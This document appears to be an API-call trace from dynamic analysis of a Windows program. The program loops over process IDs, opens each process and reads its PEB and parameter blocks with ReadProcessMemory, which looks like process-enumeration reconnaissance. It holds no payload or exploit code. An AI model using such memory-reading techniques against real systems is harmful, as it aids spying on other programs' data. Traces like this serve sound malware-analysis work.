[0413.862] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.862] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.898] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x918) returned 0x24c
[0413.898] GetLastError () returned 0x0
[0413.898] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.898] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.899] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.899] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1029e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.899] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1027a0, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.900] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.901] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.901] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.902] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x101ef0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.902] malloc (_Size=0x78) returned 0x2c1300
[0413.902] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x102810, lpBuffer=0x2c1300, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0413.902] free (_Block=0x2c1300)
[0413.903] CloseHandle (hObject=0x24c) returned 1
[0413.904] _ui64tow (_Value=0x920, _Buffer="2328", _Radix=10) returned="2336"
[0413.909] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2336") returned 4
[0413.910] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.910] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.933] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x920) returned 0x24c
[0413.933] GetLastError () returned 0x0
[0413.933] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.933] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.933] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.933] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3e2940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.934] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3e26fa, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.935] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.936] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.936] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.936] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.936] malloc (_Size=0x76) returned 0x2c1300
[0413.936] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3e2768, lpBuffer=0x2c1300, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0413.936] free (_Block=0x2c1300)
[0413.937] CloseHandle (hObject=0x24c) returned 1
[0413.938] _ui64tow (_Value=0x928, _Buffer="2336", _Radix=10) returned="2344"
[0413.944] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2344") returned 4
[0413.945] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.945] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0413.967] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x928) returned 0x24c
[0413.967] GetLastError () returned 0x0
[0413.967] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0413.967] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.968] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0413.968] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x442910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.968] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4426ee, lpBuffer=0x12dd100, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0413.969] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0413.970] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0413.970] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0413.970] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x441ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0413.971] malloc (_Size=0x6c) returned 0x2c1680
[0413.971] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x442752, lpBuffer=0x2c1680, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0413.971] free (_Block=0x2c1680)
[0413.972] CloseHandle (hObject=0x24c) returned 1
[0413.973] _ui64tow (_Value=0x930, _Buffer="2344", _Radix=10) returned="2352"
[0413.983] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2352") returned 4
[0413.984] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0413.984] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x930) returned 0x24c
[0414.007] GetLastError () returned 0x0
[0414.007] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.007] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.007] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.007] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2828c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.007] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x2826e0, lpBuffer=0x12dd100, nSize=0x50, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.008] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.009] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.010] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.010] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x281ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.010] malloc (_Size=0x58) returned 0x2b99b0
[0414.010] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x282730, lpBuffer=0x2b99b0, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2b99b0*, lpNumberOfBytesRead=0x0) returned 1
[0414.010] free (_Block=0x2b99b0)
[0414.011] CloseHandle (hObject=0x24c) returned 1
[0414.012] _ui64tow (_Value=0x938, _Buffer="2352", _Radix=10) returned="2360"
[0414.016] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2360") returned 4
[0414.018] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.018] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.040] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x938) returned 0x24c
[0414.040] GetLastError () returned 0x0
[0414.040] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.040] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.040] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.040] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x372930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.041] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3726fa, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.042] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.043] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.043] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x371ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.043] malloc (_Size=0x74) returned 0x2c1680
[0414.044] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x372766, lpBuffer=0x2c1680, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0414.044] free (_Block=0x2c1680)
[0414.044] CloseHandle (hObject=0x24c) returned 1
[0414.045] _ui64tow (_Value=0x95c, _Buffer="2360", _Radix=10) returned="2396"
[0414.050] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2396") returned 4
[0414.051] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.051] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.077] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x24c
[0414.077] GetLastError () returned 0x0
[0414.078] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.078] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.078] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.078] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5a2950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.078] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5a26f6, lpBuffer=0x12dd100, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.079] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.080] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.080] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.081] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.081] malloc (_Size=0x7c) returned 0x2e3a70
[0414.081] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5a276a, lpBuffer=0x2e3a70, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0414.081] free (_Block=0x2e3a70)
[0414.082] CloseHandle (hObject=0x24c) returned 1
[0414.083] _ui64tow (_Value=0x970, _Buffer="2396", _Radix=10) returned="2416"
[0414.087] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2416") returned 4
[0414.088] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.088] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.109] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x24c
[0414.109] GetLastError () returned 0x0
[0414.109] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.109] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.109] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.109] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1728e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.110] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1726e0, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.111] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.112] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.112] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.112] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x171ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.112] malloc (_Size=0x62) returned 0x2c0720
[0414.112] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x17273a, lpBuffer=0x2c0720, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0720*, lpNumberOfBytesRead=0x0) returned 1
[0414.112] free (_Block=0x2c0720)
[0414.113] CloseHandle (hObject=0x24c) returned 1
[0414.116] _ui64tow (_Value=0x96c, _Buffer="2416", _Radix=10) returned="2412"
[0414.120] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2412") returned 4
[0414.121] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0414.122] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0414.145] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x24c
[0414.145] GetLastError () returned 0x0
[0414.145] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0414.145] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.145] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0414.146] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x422900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.146] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4226ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0414.147] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0414.148] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0414.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0414.148] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x421ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0414.149] malloc (_Size=0x68) returned 0x2c0800
[0414.149] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x42274e, lpBuffer=0x2c0800, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0414.149] free (_Block=0x2c0800)
[0414.150] CloseHandle (hObject=0x24c) returned 1
[0414.150] _ui64tow (_Value=0x958, _Buffer="2412", _Radix=10) returned="2392"
[0414.155] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2392") returned 4
